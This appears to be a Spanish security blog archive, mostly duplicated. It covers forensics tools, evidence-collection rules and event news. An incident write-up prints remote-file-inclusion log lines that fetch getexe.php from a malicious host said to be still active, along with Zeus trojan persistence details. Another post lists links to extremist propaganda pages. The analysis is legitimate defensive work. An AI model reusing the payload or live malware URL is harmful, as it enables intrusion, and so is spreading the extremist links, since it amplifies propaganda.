Seguridad
Como estoy
Hola lectores,
Hoy es un día especial, especial para mi. Puedo cometer faltas de ortografía , de sintaxis o de existencialidad en las frases, estoy con fiebres, esas fiebres que al final son una extensión de mi mismo.
Muchos sabéis que tengo una enfermedad tropical "fiebre de query" jodido el síntoma para un informático ¿no?, coño se podía llamar de fiebres de 'lahostia', pero no al final de query.
Hoy especialmente me siento sensible, mi capacidad de raciocinio, (como diría mi jefe/amigo Alberto) hoy es limitada.
Pensaba escribir algo interesante que tengo en la chistera. Pero saldría un pufo
Hoy estoy jodido, muy jodido, y aunque se que me recuperare, espero que me perdonéis, por el lapsus, pero prometo volver en unos días. (Pedro es así, un luchador)
Joder como se mueve el sofá y el comedor...
Hoy es un día especial, especial para mi. Puedo cometer faltas de ortografía , de sintaxis o de existencialidad en las frases, estoy con fiebres, esas fiebres que al final son una extensión de mi mismo.
Muchos sabéis que tengo una enfermedad tropical "fiebre de query" jodido el síntoma para un informático ¿no?, coño se podía llamar de fiebres de 'lahostia', pero no al final de query.
Hoy especialmente me siento sensible, mi capacidad de raciocinio, (como diría mi jefe/amigo Alberto) hoy es limitada.
Pensaba escribir algo interesante que tengo en la chistera. Pero saldría un pufo
Hoy estoy jodido, muy jodido, y aunque se que me recuperare, espero que me perdonéis, por el lapsus, pero prometo volver en unos días. (Pedro es así, un luchador)
Joder como se mueve el sofá y el comedor...
Categorías: Seguridad
Ciberterrorismo y propaganda
Hola lectores,
Durante estas semanas estoy al tanto de como se utiliza internet como medio de explotación indirecta para la 'guerra de información" desde ella se utiliza métodos para engañar e influenciar el comportamiento de un público normalmente joven que tiene los suficientes medios técnicos y recursos para utilizarlos.
No olvidemos que los jóvenes de hoy son o pueden ser potencialmente 'bombas' tecnológicas en el futuro.
Es decir no deja de ser guerra psicológica.
El Departamento de Defensa de EE.UU, define la guerra psicológica como:
"El uso planificado de propaganda y otros psicológicos acciones con la finalidad primordial de influir en las opiniones, emociones, actitudes y comportamiento de grupos extranjeros hostiles de tal manera que contribuya a la consecución de los objetivos nacionales.
Durante la semana pasada, he estado siguiendo y consiguiendo un perfil de posibles sitios legítimos de ISP's que sabiéndolo o no, hospedan sitios web islamistas con información propagandística sobre la guerra y terrorismo internacional. Desde ellos se puede sacar un perfil más exacto de personas, ideologías y sus seguidores. (podéis alucinar lo que se encuentra por estos lares)
Para ello he seguido una pauta muy sencilla, primero me he creado un 'robot-araña' que me pudiera buscar sitios web con palabras clave, una vez lanzado he utilizado MALTEGO para poder profundizar sobre alguno de los personajes que aparecen en este listado. (Joder con el Facebook, es mas sencillo), aunque maltego, cumple al 100% con esa información.
Aquí teneis algunos listados:
Disclaimer:
Atención!! alguno de ellos contiene datos y vídeos ofensivos, no me hago responsable de lo que se siente.
http://www.facebook.com/group.php?gid=2331004717
http://www.nodo50.org/csca/agenda2003/resistencia/resistencia.htmlhttp://groups.msn.com/HEZBOALLAHhttp://www.albasrah.net/moqawama/english/iraqi_resistance.htmhttp://hezboallahpartidoislamico.blogspot.es/http://br.groups.yahoo.com/group/alqaeda/http://english.moqawama.org/index.phphttp://www.islamicdigest.net/v8core/http://somod.shiaweb.org/http://alshahid.org/http://www.albasrah.net/media/sound/alberno.htmhttp://www.facebook.com/people/Moqawama-Islamiya/604466642http://www.facebook.com/pages/almad-myshal-wn/11712620770http://almashriq.hiof.no/lebanon/300/320/324/324.2/hizballah/films/http://weekly.ahram.org.eg/
¿Que pasa? yo lo veo claro...
Post dedicado:
Dos guardias civiles destinados en Afganistán -un capitán y un alférez- y su intérprete (de Zaragoza) -iraní nacionalizado español, de 54 años- han fallecido este miércoles en un tiroteo en la base de Qala e Naw
Categorías: Seguridad
Que cosas me pasan...
Hola lectores,
No es que sea muy dado a estas cosas pero el 'Security Porn Star' de Chema Alonso, está cociendo un Calendario Tórrido para el año 2011. El dinero será destinado a una ONG
Y si, ¡¡voy a participar!!, junto a mi amigo Juanito. Seremos la portada del mes de Noviembre (Ya estoy buscando tanga y poniéndome cachas)
Entre otros estaremos:
- Marcelo de InfoSpyware
- Rubén Santamarta de 48 bits
- Cristian Borghello de Segu-Info
- Silverhack de Informática64
- Raúl Benito de Google, y más por confirmar.
Mientras tanto en esta época estival lo que toca este próximo fin de semana es hacerse una bajada de barrancos, que estoy muy nervioso con esto de las relaciones personales ;-) Hala a pasarlo bien. Y la semana que viene volvemos con fuerza.
Categorías: Seguridad
Web Historian
Hola lectores,
Hace mucho tiempo que voy siguiendo la evolución de la empresa MANDIANT que dispone de muchos productos curiosos y productos FREE de lo más interesantes.
Hoy quiero hablar de una herramienta que me ha ayudado en la búsqueda de evidencias forenses en la navegación web y que es de una ayuda incalculable (¡¡ Bravo por los chicos de MANDIANT !!)
Ni que decir tiene existen muchas herramientas en modo comando como 'pasco' o 'galleta', pero he seleccionado esta por su sencillez y rapidez a la hora de elaborar un informe forense.
Estamos hablando de Web Historian.
Web Historian es un programa que permite a un investigador reunir, mostrar y analizar datos de la navegación que se haya producido en un equipo. Más allá de esta simple definición, la herramienta ofrece una interfaz gráfica pero simplista de ver y navegar con grandes volúmenes de datos.
Tal vez la característica más potente es la capacidad de relacionar y ofrecer múltiples puntos de vista de los datos (incluyendo gráficos y línea de tiempo) a través del analizador y la herramienta web de perfiles, con la esperanza de que los investigadores podamos llegar a conclusiones acerca de los datos que nos proporciona.
En la siguiente imágen podemos apreciar la cantidad de navegadores que soporta
Una vez que pulsamos el boton de 'start' comienza el escaneo del equipo en busca de la información de navegación, también es interesante resaltar que podemos copiar los ficheros de historico de otro equipo al que previamente hemos clonado y obtenido sus huellas, para posteriormente tratarlo en el equipo del investigador con el objeto de no alterar posibles pruebas.
Esta pantalla es el resultado del escaneo: (se han tapado datos por motivos de confidencialidad)
Desde ella podemos filtrar, en busca de objetos, imágenes, campos ocultos, etc. Como se puede apreciar dispone de muchos de ellos ya predefinidos y también podemos crearnos los nuestros.
Otra de las carácterisiticas importantes es la obtención de miniaturas ya algunos navegadores graban una instantánea de la imagen de las páginas web que se han accedido. Actualmente, Chrome y Safari son los únicos navegadores que recogen imágenes en miniaturas.
Para ver las miniaturas, disponemos de la ficha "thumbnails".
Website Analyzer
El analizador de sitios web es una representación gráfica muy útil para reducir el tiempo de análisis de grandes conjuntos de datos del historial web con estadísticas e informes visuales.
Para iniciarlo tenemos en Herramientas-> Analizar, en esta versión de momento hay cuatro informes que se pueden ejecutar sobre los datos. Para ejecutar un informe, primero debemos cargar los datos del historial web.
Cualquier informe generado o gráficos se pueden guardar como una imagen PNG para su inclusión en un informe externo.Los informes que puede generar son variados, por ejemplo el circular por dominio permite ver la frecuencia de visita de cada sitio web en el conjunto de datos, y el de línea de tiempo es perfecto para ver la frecuencia por horas.
Y por último otra de las grandes utilidades es el Web Profiler, que permite disponer de una visión completa del sitio visitado.
Lo dicho, otra herramienta (gratuita) que debemos de tener en nuestra caja de herramientas.
Podemos descargarnos esta utilidad desde la web de MANDIANT desde aquí :
http://www.mandiant.com/products/free_software/web_historian/
Categorías: Seguridad
Buena noticia
Muy bien por la Ertzaintza!!!
Desde primeras horas de la madrugada de hoy, martes, agentes de la División Antiterrorista y de Información de la Ertzaintza desarrollan un operativo contra la organización terrorista ETA en la localidad guipuzcoana de Hernani. Fruto del mismo ha sido la detención de dos presuntos terroristas a los que, entre otros actos delictivos, se les imputa su participación en el asesinato de Joseba Pagazaurtundua, en febrero de 2003.
Visto en:
http://www.ertzaintza.net/public/wps/portal/ertzaintza
Desde primeras horas de la madrugada de hoy, martes, agentes de la División Antiterrorista y de Información de la Ertzaintza desarrollan un operativo contra la organización terrorista ETA en la localidad guipuzcoana de Hernani. Fruto del mismo ha sido la detención de dos presuntos terroristas a los que, entre otros actos delictivos, se les imputa su participación en el asesinato de Joseba Pagazaurtundua, en febrero de 2003.
Visto en:
http://www.ertzaintza.net/public/wps/portal/ertzaintza
Categorías: Seguridad
Nos vamos a Almería
La Universidad de Almería lleva acabo, del 12 al 16 de Julio, el curso de verano "Seguridad en entornos Web. E-Comercio y E-Administración", un curso dirigido tanto a alumnos con perfil técnico, como a alumnos de la rama de economía, empresariales y derecho.
En este curso participaran tanto profesores de la Universidad de Almería como expertos ajenos a la misma.
El Objetivo del curso es poner en conocimiento las actuaciones del Estado en materia de Seguridad Informática, mostrando las ventajas e inseguridades actuales a las que se expone un usuario
Yo aportare mi granito con una conferencia sobre "Autopsia de una intrusión y seguridad en Banca Electrónica por Internet".
Aquí hay más información
Y me han dicho que esta muy bueno el bacalao al estilo Almeriense. ¿será verdad? ;-)
En este curso participaran tanto profesores de la Universidad de Almería como expertos ajenos a la misma.
El Objetivo del curso es poner en conocimiento las actuaciones del Estado en materia de Seguridad Informática, mostrando las ventajas e inseguridades actuales a las que se expone un usuario
Yo aportare mi granito con una conferencia sobre "Autopsia de una intrusión y seguridad en Banca Electrónica por Internet".
Aquí hay más información
Y me han dicho que esta muy bueno el bacalao al estilo Almeriense. ¿será verdad? ;-)
Categorías: Seguridad
Nos vamos a Valencia...
Al curso de verano.
Tras realizar las dos ediciones anteriores en Salamanca, este año, de la mano de la Universidad Europea de Madrid, y merced a la colaboración con el Máster Universitario en Seguridad de las Tecnologías de la Información y las Comunicaciones , tendrá lugar en Valencia durante los días 6, 7 y 8 de Julio.
Yo aportaré mi granito de arena el día 7 con la conferencia "Analisis forense en una fuga de datos".
Y degustare eso que dicen del agua de Valencia, con la sed que llevo ;-)
Tras realizar las dos ediciones anteriores en Salamanca, este año, de la mano de la Universidad Europea de Madrid, y merced a la colaboración con el Máster Universitario en Seguridad de las Tecnologías de la Información y las Comunicaciones , tendrá lugar en Valencia durante los días 6, 7 y 8 de Julio.
Yo aportaré mi granito de arena el día 7 con la conferencia "Analisis forense en una fuga de datos".
Y degustare eso que dicen del agua de Valencia, con la sed que llevo ;-)
Categorías: Seguridad
¡¡ Que vienen los Zombis !! (Historia de una denegación de servicio)
Hola lectores,
Voy a comentar algo que nos puede suceder a todos, una denegación de servicio.
El caso es el siguiente, empresa suministradora de productos de recambios de automóvil, tiene un servicio web (en PHP) de seguimiento de pedidos y comercio electrónico. Desde hace un tiempo parece que el servicio que prestan se degrada, haciendo imposible el acceso a la web.
Viernes 4 de Junio (15:30h)
El servidor web empieza a ir excesivamente lento, parece que va mal la aplicación web. Los informáticos restablecen el servicio.
Lunes 7 de Junio
Parece que el servidor no muestra el contenido de su web o parece que tarda en exceso en servir las páginas, parece que está caido. Tras comprobar que la máquina está bien, se ve que contiene multiples instancias del servidor web apache. Tras reiniciarlo al momento vuelve a tener problemas de carga. Esto se mantiene prácticamente durante todo el día.
Martes 8 de Junio
8:30h .- El servidor sigue sin señales de vida, se precisa con urgencia que el servidor este activo, dado que la mayoria de los pedidos se realiza por comercio electrónico. Gran tensión en el departamento comercial y de compras. Se llega a la conclusión que desconectando el cable de red (el de internet) la aplicación funciona correctamente en localhost
9:30h.- Analizamos lo sucedido:
Aplicación a medida de comercio electrónico en PHP con LAMP, todo monitorizado con Nagios y Awstats.
Empezamos con lo que me dan, analizando las estadisiticas. Podemos ver que efectivamente hay un considerable aumento
Mas cuando nos indican que el pico más alto de visitas es de unos 300 diarios, en el peor de los casos.
Si vemos la memoria de la máquina comprobamos que esta algo saturada
Y si vemos el tráfico de red, ni que decir tiene
Es decir, parece que además del número excesivo de conexiones, hay algo desbocado.
10:00h.- Conseguimos hacer un netstat a la máquina y esta devuelve la sorprendente lista de más de 75.000 conexiones al servidor web, tras direccionarlo a fichero (mas comodo para trabajar) vemos que la mayoria de direcciones viene del rango 222.73.68.X y que la ip 222.73.68.23 es la que más conexiones activas tiene. Tiene pinta de una botnet
Si lo intentamos Geolocalizar vemos que casi todas y especialmente estas son de China
Vamos a grabar el tráfico de red, utilizando TCPDUMP, para posteriormente análizar el mismo.
10:10h.- Vemos el log de apache, esto es importante, despues de un buen rato me choca las líneas que se repiten, especialmente esta:
222.73.68.23/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.24/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.99/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
Abro mi máquina virtual y desde el navegador introduzco la URL que me redirecciona al dominio 'asf.wdn.com', que ha su vez me regala un caramelito que más tarde será objeto de estudio
NOTA: Cuidadin que está todavia activa y te descarga algo
10:11h.- Cerramos en el cortafuegos todo el rango posible de la red 222. El servidor empieza a tener mejorias y el servicio se restablece.
10:20h.- Se decide por parte de los responsables cerrar el mayor rango posible de IP's de Asia.
11:00h.- Se cierra el caso y el servidor funciona perfectamente.
12:00h.- Me he llevado el EXE de la página web maliciosa y el tráfico en formato PCAP
13:20h.- Vamos a revisar el fichero del TCPDUMP con Whireshark. Tras un rato veo lo siguiente. Rh/cath/bin..Rhsswdh//pah/etc, todo apunta que además de las conexiones están mandando algo al servidor web
Tiene pinta de lo que es, un Shellcode, vamos a intentar guardar esa porción de código y proceder a su desemsablado
Y ahora que ya lo tenemos vamos a compilarlo y lanzarlo en un entorno controlado.
Bueno, pues todo apunta a un exploit remoto que en aparencia devuelve el contenido del fichero passwd.
AHORA A POR EL EJECUTABLE
Vamos a lanzar en una máquina virtual (sin actualizaciones) windows xp con IE 6.0 y corriendo Process Monitor de Sysinternals y una utilidad que me ha venido muy bien en alguna ocasión que se llama SpyMonitor y que sirve para monitorizar los cambios y ver a posteriori las diferencias.
Estos son los resultados:
Con privilegio de administrador se han creado los siguientes ficheros
%systemroot%\system32\sdra64.exe
%systemroot%\system32\lowsec
%systemroot%\system32\lowsec\user.ds
%systemroot%\system32\lowsec\user.ds.lll
%systemroot%\system32\lowsec\local.ds Sin ser administradores:
%appdata%\sdra64.exe
%appdata%\lowsec
%appdata%\lowsec\user.ds
%appdata%\lowsec\user.ds.lll
%appdata%\lowsec\local.dsCambios que se han realizado en el registro:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinlogonEn la clave 'userinit'
"Userinit" = "C:\WINDOWS\system32\userinit.exePor esta nueva:
"Userinit" = "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"Sin ser administradores
HKCU\Software\Microsoft\Windows\CurrentVersion\RunEn la clave 'userinit'
"Userinit" = "C:\Documents and Settings\%;user%;\Application Data\sdra64.exe"
Googleando y por lo que dicen en los foros, todo apunta a una variante del ya famoso troyano ZEUS y para poner la puntilla he búscado la IP atacante en Zeus Tracker. Zeus Tracker proporciona la posibilidad para realizar un seguimiento de ZeuS (servidores, paneles de control) y los host maliciosos que albergan los archivos de Zeus.
Y aquí tenemos nuestra IP Zombi
Muy, muy curioso...Seguiremos investigando
Quiero agradecer la ayuda a Eduardo Abril, que me ha ayudado en el desemsablado del shellcode
Voy a comentar algo que nos puede suceder a todos, una denegación de servicio.
El caso es el siguiente, empresa suministradora de productos de recambios de automóvil, tiene un servicio web (en PHP) de seguimiento de pedidos y comercio electrónico. Desde hace un tiempo parece que el servicio que prestan se degrada, haciendo imposible el acceso a la web.
Viernes 4 de Junio (15:30h)
El servidor web empieza a ir excesivamente lento, parece que va mal la aplicación web. Los informáticos restablecen el servicio.
Lunes 7 de Junio
Parece que el servidor no muestra el contenido de su web o parece que tarda en exceso en servir las páginas, parece que está caido. Tras comprobar que la máquina está bien, se ve que contiene multiples instancias del servidor web apache. Tras reiniciarlo al momento vuelve a tener problemas de carga. Esto se mantiene prácticamente durante todo el día.
Martes 8 de Junio
8:30h .- El servidor sigue sin señales de vida, se precisa con urgencia que el servidor este activo, dado que la mayoria de los pedidos se realiza por comercio electrónico. Gran tensión en el departamento comercial y de compras. Se llega a la conclusión que desconectando el cable de red (el de internet) la aplicación funciona correctamente en localhost
9:30h.- Analizamos lo sucedido:
Aplicación a medida de comercio electrónico en PHP con LAMP, todo monitorizado con Nagios y Awstats.
Empezamos con lo que me dan, analizando las estadisiticas. Podemos ver que efectivamente hay un considerable aumento
Mas cuando nos indican que el pico más alto de visitas es de unos 300 diarios, en el peor de los casos.
Si vemos la memoria de la máquina comprobamos que esta algo saturada
Y si vemos el tráfico de red, ni que decir tiene
Es decir, parece que además del número excesivo de conexiones, hay algo desbocado.
10:00h.- Conseguimos hacer un netstat a la máquina y esta devuelve la sorprendente lista de más de 75.000 conexiones al servidor web, tras direccionarlo a fichero (mas comodo para trabajar) vemos que la mayoria de direcciones viene del rango 222.73.68.X y que la ip 222.73.68.23 es la que más conexiones activas tiene. Tiene pinta de una botnet
Si lo intentamos Geolocalizar vemos que casi todas y especialmente estas son de China
Vamos a grabar el tráfico de red, utilizando TCPDUMP, para posteriormente análizar el mismo.
10:10h.- Vemos el log de apache, esto es importante, despues de un buen rato me choca las líneas que se repiten, especialmente esta:
222.73.68.23/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.24/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.99/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
Abro mi máquina virtual y desde el navegador introduzco la URL que me redirecciona al dominio 'asf.wdn.com', que ha su vez me regala un caramelito que más tarde será objeto de estudio
NOTA: Cuidadin que está todavia activa y te descarga algo
10:11h.- Cerramos en el cortafuegos todo el rango posible de la red 222. El servidor empieza a tener mejorias y el servicio se restablece.
10:20h.- Se decide por parte de los responsables cerrar el mayor rango posible de IP's de Asia.
11:00h.- Se cierra el caso y el servidor funciona perfectamente.
12:00h.- Me he llevado el EXE de la página web maliciosa y el tráfico en formato PCAP
13:20h.- Vamos a revisar el fichero del TCPDUMP con Whireshark. Tras un rato veo lo siguiente. Rh/cath/bin..Rhsswdh//pah/etc, todo apunta que además de las conexiones están mandando algo al servidor web
Tiene pinta de lo que es, un Shellcode, vamos a intentar guardar esa porción de código y proceder a su desemsablado
Y ahora que ya lo tenemos vamos a compilarlo y lanzarlo en un entorno controlado.
Bueno, pues todo apunta a un exploit remoto que en aparencia devuelve el contenido del fichero passwd.
AHORA A POR EL EJECUTABLE
Vamos a lanzar en una máquina virtual (sin actualizaciones) windows xp con IE 6.0 y corriendo Process Monitor de Sysinternals y una utilidad que me ha venido muy bien en alguna ocasión que se llama SpyMonitor y que sirve para monitorizar los cambios y ver a posteriori las diferencias.
Estos son los resultados:
Con privilegio de administrador se han creado los siguientes ficheros
%systemroot%\system32\sdra64.exe
%systemroot%\system32\lowsec
%systemroot%\system32\lowsec\user.ds
%systemroot%\system32\lowsec\user.ds.lll
%systemroot%\system32\lowsec\local.ds Sin ser administradores:
%appdata%\sdra64.exe
%appdata%\lowsec
%appdata%\lowsec\user.ds
%appdata%\lowsec\user.ds.lll
%appdata%\lowsec\local.dsCambios que se han realizado en el registro:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinlogonEn la clave 'userinit'
"Userinit" = "C:\WINDOWS\system32\userinit.exePor esta nueva:
"Userinit" = "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"Sin ser administradores
HKCU\Software\Microsoft\Windows\CurrentVersion\RunEn la clave 'userinit'
"Userinit" = "C:\Documents and Settings\%;user%;\Application Data\sdra64.exe"
Googleando y por lo que dicen en los foros, todo apunta a una variante del ya famoso troyano ZEUS y para poner la puntilla he búscado la IP atacante en Zeus Tracker. Zeus Tracker proporciona la posibilidad para realizar un seguimiento de ZeuS (servidores, paneles de control) y los host maliciosos que albergan los archivos de Zeus.
Y aquí tenemos nuestra IP Zombi
Muy, muy curioso...Seguiremos investigando
Quiero agradecer la ayuda a Eduardo Abril, que me ha ayudado en el desemsablado del shellcode
Categorías: Seguridad
Recolección de evidencias (Parte I)
Hola lectores,
Muchos sois los que llevais pidiendo información de que métodos son los empleados para la recolección de evidencias.
Voy a tratar de poner en dos post más o menos los pasos que sigo para que de alguna forma sea valido ante el juez, el primer post trata de la parte física y el segundo de un pequeño cuestionario que es interesante cuando no se obtiene toda la información o es parcial.
Aquí os dejo mis reglas de oro que hasta ahora son admitidas por los juzgados
EQUIPOS
DISPOSITIVOS MOVILES
Muchos sois los que llevais pidiendo información de que métodos son los empleados para la recolección de evidencias.
Voy a tratar de poner en dos post más o menos los pasos que sigo para que de alguna forma sea valido ante el juez, el primer post trata de la parte física y el segundo de un pequeño cuestionario que es interesante cuando no se obtiene toda la información o es parcial.
Aquí os dejo mis reglas de oro que hasta ahora son admitidas por los juzgados
EQUIPOS
- Realizar una sesión fotográfica de la sala antes de comenzar la tarea, la entrada y distintas salidas (si las hubiera) como por ejemplo ventanas. Las fotos deben de tener sobreimpresa digitalmente la fecha y hora.
- Fotografíe el ordenador de frente con los cables y por detrás, así como dispositivos conectados tal y como se encuentran. Haga más de una foto si es preciso
- No utilice el ordenador ni intente buscar pruebas.
- Si el equipo está "apagado", no "encender".
- Si el equipo está "encendido" y se muestran los mensajes en el monitor, realizar una fotografía de la pantalla.
- Si el equipo está "encendido" y la pantalla está en blanco, mueva el ratón o la barra de espacio (esto mostrará la imagen activa en la pantalla). Realice a continuación la fotografía.
- Desconecte la fuente de alimentación del router.
- Desconecte el cable de alimentación de la parte posterior del equipo (No hacer un apagado ordenado)
- Realice un diagrama si es una red y empiece a crear las etiquetas (ver mi etiquetadora profesional) de los dispositivos conectados.
- Desconecte todos los demás cables y los dispositivos del equipo.
- Tenga preparada bolsas etiquetadas o en su defectos paquetes para el transporte de los dispositivos
- Haga lo mismo con los dispositivos extraibles (pendrives)
- Mantenga todos los medios de comunicación, incluido el equipo, lejos de los imanes, radiotransmisores y otros elementos potencialmente dañinos.
- Recopile manuales de instrucciones, documentación y posible notas que hubiera en el lugar (es recomendable proceder a su etiquetado).
- Documentar todos los pasos implicados en la adquisición del ordenador y sus componentes.
DISPOSITIVOS MOVILES
- Si el dispositivo está apagado "no" encender ".
- Con una PDA o teléfonos móviles, si el dispositivo está encendido, NO LO APAGUE. Si se apaga el dispositivo podría habilitar el password de inicio, por lo tanto impediría el acceso a las pruebas.
- Fotografíe el dispositivo y la pantalla (si está disponible).
- Etiquetar y recoger todos los cables (incluyendo la fuente de alimentación)
- Intentar que el dispositivo mantenga la batería en la medida de lo posible
- Etiquete el almacenamiento adicional de los dispositivos (Sticks de memoria, compact flash, etc).
- Documentar todos los pasos implicados en la adquisición del móvil y sus componentes.
Categorías: Seguridad
Detenidas 25 personas e imputadas otras 21 por difundir Pornografía Infantil a través de la red Ares.
Este Grupo de Delitos Telemáticos de la Unidad Central Operativa de la Guardia Civil, en el marco de la operación “MERCADILLO”, desarrollada en varias comunidades autónomas, ha procedido a la detención de 25 personas e imputación de otras 21, por facilitar la distribución de archivos de contenido pedófilo a través de la red P2P ARES.
Durante la operación se han efectuado un total de 49 registros domiciliarios en los que se han intervenido numerosos dispositivos informáticos con contenido pedófilo.
Para llevar a cabo dicha búsqueda, los agentes se han valido de la nueva versión del buscador denominado “NAUTILUS” desarrollado por el Grupo de Delitos Telemáticos, cuyo objetivo es la detección del intercambio de material pedófilo a través de la red P2P ARES.
La selección de objetivos de entre todos los usuarios identificados por compartir alguno de los videos de pornografía infantil, se ha realizado siguiendo criterios jurisprudenciales que establecen un mínimo de ficheros pedófilos compartidos, para evitar conductas ocasionales o accidentales.
VISTO EN: La web de la Guardia Civil
Durante la operación se han efectuado un total de 49 registros domiciliarios en los que se han intervenido numerosos dispositivos informáticos con contenido pedófilo.
Para llevar a cabo dicha búsqueda, los agentes se han valido de la nueva versión del buscador denominado “NAUTILUS” desarrollado por el Grupo de Delitos Telemáticos, cuyo objetivo es la detección del intercambio de material pedófilo a través de la red P2P ARES.
La selección de objetivos de entre todos los usuarios identificados por compartir alguno de los videos de pornografía infantil, se ha realizado siguiendo criterios jurisprudenciales que establecen un mínimo de ficheros pedófilos compartidos, para evitar conductas ocasionales o accidentales.
VISTO EN: La web de la Guardia Civil
Categorías: Seguridad
